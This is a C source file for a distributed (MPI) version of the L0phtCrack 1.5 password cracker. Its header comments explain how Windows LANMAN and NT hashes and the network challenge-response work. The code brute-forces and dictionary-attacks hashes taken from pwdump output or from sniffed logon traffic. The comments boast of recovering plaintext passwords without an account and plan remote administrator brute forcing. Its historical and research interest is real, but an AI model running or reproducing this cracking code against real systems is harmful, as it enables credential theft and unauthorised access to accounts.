/* L0phtcrack 1.5 06.02.97 mudge@l0pht.com
   The original comments are left below for those that missed the first
   release. It still does all of the things the first one did PLUS:

   . Can now dictionary attack or brute force the network NT server 
     challenge that is used to prevent the OWF from going across the
     wire in its plaintext format. Here's how their setup works:

        [assuming initial setup etc...]

           8byte "random" challenge
     Client <---------------------- Server
     OWF1 = pad Lanman OWF with 5 nulls
     OWF2 = pad NT OWF with 5 nulls
     resp = E(OWF1, Chal) E(OWF2, Chal)
           48byte response (24byte lanman 24byte nt)
     Client -----------------------> Server

     The client takes the OWF ( all 16 bytes of it) and pads with 5 nulls. 
     From this point it des ecb encrypts the, now 21byte, OWF with the
     8byte challenge. The resulting 24byte string is sent over to the
     server who performs the same operations on the OWF stored in it's
     registry and compares the resulting two 24byte strings. If they 
     match the user used the correct passwd.

     What's cool about this? Well, now you can take your sniffer logs
     of NT logons and retrieve the plaintext passwords. This does not
     require an account on the NT machine nor does it require previous
     knowledge of the ADMINISTRATOR password. 

     See, the problem was that of Microsoft's horrible marketing driven 
     patch to prevent pwdump from working. [elaborate on why that sucked]

   . Recursion has been removed from both the brute forcing in the Lanman
     case and also in the NT case derivation from the Lanman password.
     The iterative functions, although they don't logically represent
     the problem as well as their recursive predecessors, are much more
     memory friendly.

   . The large bruter routine no longer overflows the Pentium L2 cache,
     well it didn't seem to do so bad if you had a 512k L2 cache as opposed
     to a 256k on. This offers a large performance increase in bruting.

   . A couple of bugs were fixed.

  NT-Cracker 03.24.97 mudge@l0pht.com
   This program takes the smbpassword file or the output generated by
   the excellent program pwdump (author name) and dictionary attacks
   the LANMAN One Way Password - 

  LANMAN One Way Passwords are created in the following fashion:
	. The password is first converted to uppercase
	. If the password is longer than 14 chars (bytes) then it
		is truncated
	. If the password is less than 14 chars (bytes) then it is
		padded with NULL's to 14 bytes.
	. The padded/truncated password is then split in half and each
		half is used to generate an odd parity DES key
	. An 8 byte fixed value is then encrypted with each of the
		DES keys - these two results are concatenated together
		to produce a 16byte hash.

	The fixed value that is encrypted by each of the DES keys is the 
	decryption of the value 0xAAD3B435B51404EE with a key of all zeros.

  Todo: add an entire keyspace attack to guarantee 
        we get all of the passwords
  Todo: Roll this into pwdump and add the ability to try to brute 
        force the administrators passwords on remote machines to obtain 
		full user listings and OWPasswords.
  Todo: GUI for the Windows users - weld's job
  Todo: CLI portable
  Todo: If not bruting - let people know if we couldn't find the passwd in a 
      dictionary and the word is <= 7 chars

  Crikey! Now I see where ECB mode is going to kill them in the NT 
  dialect - this should make bruting either one trivial!

  BIG KUDOS go out to Hobbit@avian.org for his outstanding work in debunking
  CIFS. Without information provided in his paper this program wouldn't be
  here!

  This work is provided by the L0pht - it contains code from the 
  following places:
		. Plenty of original code
		. generic routines from the samba code source
		. md4 routines from RSA
		. DES routines from Eric Young's libdes
*/

#include <mpi.h>
#include <stdio.h>
#include <stdlib.h>
#include <memory.h>
#include <string.h>
#include <ctype.h>

#include "md4.h"
#include "dkbfincludes.h"
#include "dkbfuser.h"
#include "dkbfconfig.h"
#include "des.h"

#ifndef _DEBUG
#define _DEBUG
#endif

extern void E_P24(uchar *, uchar *, uchar *);
extern void str_to_key (unsigned char *, unsigned char *);
extern void LowerString (char *holder, char *word);
extern int PutUniCode (char *dst, char *src);

void nt_ify_list (struct user_struct *head);
int brute_routine (struct user_struct *head, char *half_hash,
		   char *brute_str, CONFIG *Config);
void md4hash (char *passwd, unsigned char *p16, int len);
void f2 (struct user_struct *Ustruct, char *str);
int cracklanman (struct user_struct *Ustruct, char *dict_word, char *tmphash);
void half_lanman (char *half_hash, char *brute_str);
int crackntdialect (struct user_struct *Ustruct, char *passwd,
		    int check_case);
int lm_check_sniff(struct user_struct *head, char *brute_str, CONFIG *Config);
int nt_check_sniff(struct user_struct *head, char *nthash);

/* MPI fxs */
int report_account (struct user_struct *);

char str_to_crypt[] = "\x4b\x47\x53\x21\x40\x23\x24\x25";

int
brute_routine (struct user_struct *head, char *half_hash, char *brute_str,
	       CONFIG *Config)
{
  struct user_struct *index;
  int positive = 0;

  index = head;

  while (index != NULL)
    {

      if (index->under7)	//if under 7 or equal to 7 characters 
	{
	  if (memcmp (index->lmhashb, half_hash, 8) == 0)
	    {
	      strncpy (index->first_half, brute_str, 7);
	      strncpy (index->lmpasswd, brute_str, 7);
	      index->lmdone = 1;
	      if(Config->algorithm == LM_DUMP)
		{
		  index->ntdone = 1;
		}
	      report_account (index);
	      positive = 1;	//triggers nt_ify_list()
	    }
	}
      else			//if 8 or more chars 
	{
	  //if we don't have the 1st_half already
	  if (strlen (index->first_half) == 0)
	    {
	      //see if the hash matches the first half  
	      if (memcmp (index->lmhashb, half_hash, 8) == 0)
		{
		  //if it matches we have know the first 7
		  strncpy (index->first_half, brute_str, 7);
		  report_account (index);
		}
	    }
	  //if we don't have the 2nd half already
	  if (strlen (index->second_half) == 0)
	    {
	      //see if the hash matches the second_half
	      if (memcmp (&index->lmhashb[8], half_hash, 8) == 0)
		{
		  strncpy (index->second_half, brute_str, 7);
		  report_account (index);
		}
	    }
	  if ((strlen (index->first_half) > 0)
	      && (strlen (index->second_half) > 0))
	    {
	      //if 1st & 2nd half are both done cat them to make 
	      //nt passwd without correct case 
	      strncpy (index->lmpasswd, index->first_half, 7);
	      strncat (&index->lmpasswd[7], index->second_half, 7);
	      index->lmdone = 1;
	      if(Config->algorithm == LM_DUMP)
		{
		  index->ntdone = 1;
		}
	      positive = 1;	//trigger nt_ify_list 
	      report_account (index);
	    }
	}			// end if under7
      index = index->next;
    }
  return (positive);
}
void
nt_ify_list (struct user_struct *head)
{
/* go through each node and check for ones that have LM cracked
   and get case senstive NT passwd
 */
  struct user_struct *index;
  index = head;

  while (index)
    {
      if (index->lmdone == 1)
	crackntdialect (index, index->lmpasswd, 1);
      if((index->ntdone != 1) && index->lmdone == 1) 
	{
	  index->ntdone =1;
	  strcpy(index->ntpasswd, "[failed]");
	  report_account(index);
	}
      index = index->next;
    }
}
int
crackntdialect (struct user_struct *Ustruct, char *passwd, int check_case)
{
  char ntpasswd[129];

  memset (ntpasswd, '\0', sizeof (ntpasswd));

  LowerString (ntpasswd, passwd);
  f2 (Ustruct, ntpasswd);
  return 0;
}
/* Recursively check all variations on case as the NT Dialect passwd is case
   sensitive. This isn't too bad as the total possible perms is only 2 to the
   power of strlen(wordtocompare). We really need to make this iterative
   to save on memory and increase speed. If the function finds a match it
   puts it in Ustruct->ntpasswd. */
void
f2 (struct user_struct *Ustruct, char *str)
{
  unsigned long i, j;
  char tmp[128], hold[256];
  unsigned char p16[16];
  int len, uni_len, iters;

  len = strlen (str);
  iters = 1 << len;

  for (i = 0; i < iters; i++)
    {
      strcpy (tmp, str);
      /* Set case for this round  */
      for (j = 0; j < len; j++)
	{
	  if (i & (1 << j))
	    {
	      tmp[j] = toupper (tmp[j]);
	    }
	}

      memset (hold, '\0', sizeof (hold));
      uni_len = PutUniCode (hold, tmp);

      md4hash (hold, p16, uni_len);
      if (Ustruct->pwdumpval)
	{			/* we're dealing with pwdump */
	  if (memcmp (p16, Ustruct->nthashb, 16) == 0)
	    {
	      strncpy (Ustruct->ntpasswd, tmp, NTPASSWDLEN);
	      Ustruct->ntdone = 1;
	      report_account(Ustruct);
	      return;
	    }
	}
      else /* sniffer logs */
	{
	  if (nt_check_sniff(Ustruct, p16) == 1)
	    {
	    strncpy(Ustruct->ntpasswd, tmp, NTPASSWDLEN);
	    report_account(Ustruct);
	    return;
	    }
	} 
    }/* end for */
}
void
md4hash (char *passwd, unsigned char *p16, int len)
{
  int i = 0;
  MDstruct MD;

  MDbegin (&MD);
  for (i = 0; i + 64 <= len; i += 64)
    {
      MDupdate (&MD, (unsigned char *) passwd + (i / 2), 512);
#ifdef BIGENDIAN
      MDreverse (MD.buffer);
#endif
    }
  MDupdate (&MD, (unsigned char *) passwd + (i / 2), (len - i) * 8);
#ifdef BIGENDIAN
  MDreverse (MD.buffer);
#endif

  memcpy (p16, (unsigned char *) MD.buffer, 16);

}

void
half_lanman (char *half_hash, char *brute_str)
{
  unsigned char lanman[8];
  des_cblock deskey1;
  des_key_schedule ks1;

  /* create the first 8byte odd parity des key */
  str_to_key ((unsigned char *) brute_str, deskey1);
  /* setup the key schedule */
  des_set_key ((des_cblock *) deskey1, ks1);

  /* encrypt the known 8byte value against the first des key */
  des_ecb_encrypt ((des_cblock *) str_to_crypt, (des_cblock *) lanman, ks1,
		   DES_ENCRYPT);

  memcpy (half_hash, lanman, 8);
}
/* routine to check the LANMAN passwd */
void full_lanman(char *fullhash, char *dict_word){
  unsigned char passwd[14];
  unsigned char lanman[16];
  des_cblock deskey1, deskey2;
  des_key_schedule ks1, ks2;

  memset(passwd, '\0', sizeof(passwd));
  memset(lanman, '\0', sizeof(lanman));

  strncpy(passwd, dict_word, 14);

  str_to_key(passwd, deskey1);  /* create the first 8byte odd 
                                   parity des key */
  des_set_key((des_cblock *)deskey1,ks1); /* setup the key schedule */

  des_ecb_encrypt((des_cblock *)str_to_crypt, /* encrypt the known 
                                                 8byte value */
              (des_cblock *)lanman, ks1, DES_ENCRYPT); /* against the 
                                                   first des key */

  str_to_key(&(passwd[7]), deskey2);
  des_set_key((des_cblock *)deskey2,ks2);

  des_ecb_encrypt((des_cblock *)str_to_crypt,\
                              (des_cblock *)&lanman[8], ks2, DES_ENCRYPT);

  strncpy(fullhash, (const char *)lanman, sizeof(lanman));

}
int
lm_check_sniff(struct user_struct *head, char *brute_str, CONFIG *Config)
{
  struct user_struct *index;
  char pre_lmresp[21];
  char response[24];
  char full_lmhash[16];
  int positive=0;

  index = head;

  memset(pre_lmresp, '\0', 21);
  full_lanman(full_lmhash, brute_str);
  memcpy(pre_lmresp, full_lmhash, 16);

  while (index != NULL)
    {     
      E_P24(pre_lmresp, index->server_chall, response);
      
      if (memcmp(index->lmresp_b, response, 24) == 0)
	{
	  memcpy(index->lmpasswd, brute_str, 14);
	  memcpy(index->lmhashb, full_lmhash, 16);
	      index->lmdone = 1;
	  if(Config->algorithm == LM_SNIFF)
	    {
	      index->ntdone = 1;
	    }
	  report_account(index);
	  positive = 1;
	}
      index = index->next;
    }
  return(positive);
}
int
nt_check_sniff(struct user_struct *index, char *nthash)
{
  char pre_ntresp[21];
  char response[24];

  memset(pre_ntresp, '\0', 21);
  memcpy(pre_ntresp, nthash, 16);
  E_P24(pre_ntresp, index->server_chall, response);
  
  if (memcmp(index->ntresp_b, response, 24) == 0){
    memcpy(index->nthashb, nthash, 16);
    index->ntdone = 1;
    return 1;
  }
  return 0;
}
int
report_account (struct user_struct *index)
{
  int request  = REPORT_ACCOUNT;
  MPI_Datatype   *pUserInfo;

  pUserInfo = CommitUserInfo ();
 
 /* tell master we sending an update on an account */
  MPI_Send (&request, 1, MPI_INT, MASTER, MPI_MSG_TAG, MPI_COMM_WORLD);

  /*send the account */
  MPI_Send (index, 1, *pUserInfo, MASTER, MPI_MSG_TAG, MPI_COMM_WORLD);

  MPI_Type_free (pUserInfo);

  return 0;
}
